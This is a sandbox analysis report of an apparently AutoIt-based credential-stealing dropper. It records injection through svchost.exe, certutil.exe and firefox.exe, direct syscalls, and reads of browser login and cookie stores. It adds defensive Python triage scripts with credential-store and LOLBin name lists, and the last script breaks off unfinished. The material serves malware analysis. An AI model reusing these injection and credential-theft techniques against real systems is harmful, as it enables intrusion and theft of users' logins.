            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] (5 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]
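Every line above is a 32-bit `mov r32, dword ptr fs:[30h]`, the load of the PEB pointer from the TEB. On its own that instruction is neutral: what makes it anti-debugging (PEB.BeingDebugged at +0x02, PEB.NtGlobalFlag at +0x68) rather than manual API resolution (walking PEB.Ldr at +0x0C, which is what the "dynamically determine API calls" signature in the overview points at) is the field the code dereferences next. The scanner below is an added example for triaging your own dumps, not Joe Sandbox code and not code from the analysed sample. It finds both encodings of the load in raw x86 bytes and classifies the following `[reg+disp8]` access; the sample bytes are hand-assembled and constructed for the example.

```python
"""Locate 32-bit PEB reads (mov r32, fs:[30h]) in raw x86 code and classify
what the code does with the PEB pointer right afterwards.

Added triage example; not Joe Sandbox code and not part of the analysed sample.
Offsets are those of the 32-bit PEB.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import List, Optional, Tuple

REG32 = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")

# 32-bit PEB fields that malware commonly reads right after fs:[30h].
PEB_FIELDS = {
    0x02: "BeingDebugged",      # anti-debug
    0x0C: "Ldr",                # walk loaded modules to resolve APIs by hand
    0x10: "ProcessParameters",  # command line / image path
    0x18: "ProcessHeap",
    0x68: "NtGlobalFlag",       # anti-debug: heap flags 0x70 are set under a debugger
}

# Opcodes followed by a ModRM byte whose [reg+disp8] form we recognise:
# 8B mov r32,r/m32   8A mov r8,r/m8   80 grp1 r/m8,imm8 (cmp ...)
# F6 test r/m8,imm8   0F B6 movzx r32,r/m8
_DEREF_OPCODES = (b"\x8B", b"\x8A", b"\x80", b"\xF6", b"\x0F\xB6")


@dataclass(frozen=True)
class PebRead:
    offset: int            # offset of the fs:[30h] load within the scanned bytes
    reg: str               # register that receives the PEB pointer
    field: Optional[int]   # PEB offset dereferenced by the following instruction

    @property
    def field_name(self) -> str:
        if self.field is None:
            return "unknown"
        return PEB_FIELDS.get(self.field, f"PEB+0x{self.field:02X}")


def _peb_load(code: bytes, i: int) -> Optional[Tuple[int, int]]:
    """Return (register index, length) if code[i:] is 'mov r32, fs:[30h]'.

    Two encodings exist: 64 A1 30 00 00 00 (eax only, moffs32 form) and
    64 8B /r 30 00 00 00 with ModRM mod=00, rm=101 (disp32, any r32).
    """
    if code[i] != 0x64:                       # fs segment override prefix
        return None
    if code[i + 1:i + 6] == b"\xA1\x30\x00\x00\x00":
        return 0, 6
    if code[i + 1:i + 2] == b"\x8B" and i + 7 <= len(code):
        modrm = code[i + 2]
        if (modrm & 0xC7) == 0x05 and code[i + 3:i + 7] == b"\x30\x00\x00\x00":
            return (modrm >> 3) & 7, 7
    return None


def _deref_field(code: bytes, i: int, reg: int) -> Optional[int]:
    """If the instruction at code[i:] reads [reg+disp8], return disp8."""
    if reg == 4:                               # esp as base needs a SIB byte; not a PEB idiom
        return None
    for opc in _DEREF_OPCODES:
        n = len(opc)
        if code[i:i + n] == opc and i + n + 1 < len(code):
            modrm = code[i + n]
            if (modrm & 0xC0) == 0x40 and (modrm & 7) == reg:   # mod=01: [base+disp8]
                return code[i + n + 1]
    return None


def find_peb_reads(code: bytes) -> List[PebRead]:
    """Linear byte scan. Without a disassembler it can also hit data or the tail
    of another instruction, so confirm hits in a disassembler before reporting."""
    hits: List[PebRead] = []
    i = 0
    while i < len(code):
        load = _peb_load(code, i)
        if load is None:
            i += 1
            continue
        reg, length = load
        hits.append(PebRead(i, REG32[reg], _deref_field(code, i + length, reg)))
        i += length
    return hits


def summarize(hits: List[PebRead]) -> dict:
    """Count reads per PEB field (the per-function view a sandbox report gives)."""
    counts: dict = {}
    for h in hits:
        counts[h.field_name] = counts.get(h.field_name, 0) + 1
    return counts


# Constructed sample (hand-assembled for this example, not bytes from the analysed file):
SAMPLE = bytes.fromhex(
    "55"              # push ebp
    "8bec"            # mov ebp, esp
    "64a130000000"    # mov eax, dword ptr fs:[30h]
    "0fb64002"        # movzx eax, byte ptr [eax+2]      -> PEB.BeingDebugged
    "85c0"            # test eax, eax
    "7505"            # jne short +5
    "648b0d30000000"  # mov ecx, dword ptr fs:[30h]
    "8b410c"          # mov eax, dword ptr [ecx+0Ch]     -> PEB.Ldr
    "648b1530000000"  # mov edx, dword ptr fs:[30h]
    "f6426870"        # test byte ptr [edx+68h], 70h     -> PEB.NtGlobalFlag
    "c3"              # ret
)

if __name__ == "__main__":
    for h in find_peb_reads(SAMPLE):
        print(f"+0x{h.offset:04x}: mov {h.reg}, fs:[30h] -> {h.field_name}")
    print(summarize(find_peb_reads(SAMPLE)))
```

Run it over a memory dump of the injected svchost.exe region (the `2_2_030xxxxx` addresses above are relative to that process) to split the list into debugger checks and loader walks. The variant that goes through `fs:[18h]` (TEB self pointer) and then `[eax+30h]` is not matched; add it if your sample uses it.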
            Source: C:\Users\user\Desktop\Documente de expediere.exe  Code function: 0_2_006E81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\Documente de expediere.exe  Code function: 0_2_006BA364 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\Documente de expediere.exe  Code function: 0_2_006BA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtCreateKey: Direct from: 0x77762C6C
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtQuerySystemInformation: Direct from: 0x777648CC
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtOpenSection: Direct from: 0x77762E0C
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtAllocateVirtualMemory: Direct from: 0x77762BEC
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtQueryInformationToken: Direct from: 0x77762CAC
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtTerminateThread: Direct from: 0x77762FCC
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtCreateFile: Direct from: 0x77762FEC
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtOpenFile: Direct from: 0x77762DCC
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtOpenKeyEx: Direct from: 0x77762B9C
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtSetInformationProcess: Direct from: 0x77762C5C
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
Source: C:\Users\user\Desktop\Documente de expediere.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\certutil.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: NULL target: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe protection: read write
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: NULL target: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\certutil.exe | Thread register set: target process: 7584
Source: C:\Windows\SysWOW64\certutil.exe | Thread APC queued: target process: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
Source: C:\Users\user\Desktop\Documente de expediere.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3C2008
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_006E8C93 LogonUserW,0_2_006E8C93
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_00693B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00693B4C
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_00694A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00694A35
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_006F4EF5 mouse_event,0_2_006F4EF5
Source: C:\Users\user\Desktop\Documente de expediere.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Documente de expediere.exe"
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | Process created: C:\Windows\SysWOW64\certutil.exe "C:\Windows\SysWOW64\certutil.exe"
Source: C:\Windows\SysWOW64\certutil.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_006E81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006E81F7
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_006F4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_006F4C03
Source: Documente de expediere.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Documente de expediere.exe, QAWHbhvedb.exe, 0000000D.00000000.1457508955.0000000001891000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000002.3713023900.0000000001890000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000000.1610140247.0000000001210000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: QAWHbhvedb.exe, 0000000D.00000000.1457508955.0000000001891000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000002.3713023900.0000000001890000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000000.1610140247.0000000001210000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: QAWHbhvedb.exe, 0000000D.00000000.1457508955.0000000001891000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000002.3713023900.0000000001890000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000000.1610140247.0000000001210000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
Source: QAWHbhvedb.exe, 0000000D.00000000.1457508955.0000000001891000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000002.3713023900.0000000001890000.00000002.00000001.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000000.1610140247.0000000001210000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_006B886B cpuid 0_2_006B886B
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_006C50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006C50D7
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_006D2230 GetUserNameW,0_2_006D2230
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_006C418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_006C418A
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_00694AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00694AFE

            Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\certutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\certutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\certutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\certutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\certutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\certutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\certutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\certutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\certutil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: Documente de expediere.exe | Binary or memory string: WIN_81
Source: Documente de expediere.exe | Binary or memory string: WIN_XP
Source: Documente de expediere.exe | Binary or memory string: WIN_XPe
Source: Documente de expediere.exe | Binary or memory string: WIN_VISTA
Source: Documente de expediere.exe | Binary or memory string: WIN_7
Source: Documente de expediere.exe | Binary or memory string: WIN_8
Source: Documente de expediere.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
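The behaviour lines above (the direct Nt* syscalls from QAWHbhvedb.exe, the RWX section mappings from Documente de expediere.exe into svchost.exe, from svchost.exe into certutil.exe and from certutil.exe into firefox.exe, the thread-context/APC hijacks, the svchost.exe created with the dropper's command line, certutil.exe started with no arguments, the Chrome/Edge Login Data and Cookies opens, the Outlook profile key and the AutoIt runtime strings) are what an analyst would triage first. The following script is an added example, not part of this report or of Joe Sandbox; it parses such lines once they are delimited as "Source: <process> | <event>: <detail>" and turns them into findings. SAMPLE_LINES is a shortened subset of this report's own lines in that form; the LOLBin, browser and credential-store name lists are the author's assumptions.

```python
"""Triage of Joe Sandbox behaviour lines: injection chain, direct syscalls,
LOLBin abuse, credential-store access and AutoIt markers.

Added example; not part of this report or of Joe Sandbox.  SAMPLE_LINES are
a shortened subset of the report's lines, re-delimited as
"Source: <process> | <event>: <detail>".  The name lists are assumptions.
"""
import ntpath
import re
from collections import defaultdict

SAMPLE_LINES = r"""
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
Source: C:\Users\user\Desktop\Documente de expediere.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\certutil.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\certutil.exe | Thread register set: target process: 7584
Source: C:\Users\user\Desktop\Documente de expediere.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Documente de expediere.exe"
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | Process created: C:\Windows\SysWOW64\certutil.exe "C:\Windows\SysWOW64\certutil.exe"
Source: C:\Windows\SysWOW64\certutil.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\SysWOW64\certutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\certutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\certutil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: Documente de expediere.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)>>>AUTOIT SCRIPT<<<
""".strip().splitlines()

LINE_RE = re.compile(r"^Source:\s*(?P<src>.+?)\s*\|\s*(?P<event>[^:]+?):\s*(?P<detail>.*)$")
SECTION_RE = re.compile(r"target:\s*(?P<target>.+?)\s+protection:\s*(?P<prot>.+)$")
PROC_RE = re.compile(r'^(?P<image>.+?\.exe)\s+"(?P<cmd>[^"]*)"')   # "<image> "<command line>""
SYSCALL_RE = re.compile(r"^Nt[A-Z]\w+$")

# Assumed name lists (author's choice, not from the report); extend as needed.
LOLBINS = {"svchost.exe", "certutil.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe"}
CRED_FILES = {"login data", "cookies", "web data", "local state", "key4.db", "logins.json"}
OUTLOOK_PROFILES = r"windows messaging subsystem\profiles"
AUTOIT_MARKERS = (">>>AUTOIT SCRIPT<<<", "AU3!")   # AU3!EA06 is the compiled-script resource magic


def base(path):
    return ntpath.basename(path.strip()).lower()


def triage(lines):
    direct_syscalls = defaultdict(set)   # process -> Nt* calls issued outside the ntdll stubs
    rwx_sections, thread_hijacks, process_tree, cred_hits, flags = [], [], [], [], []
    autoit = False
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
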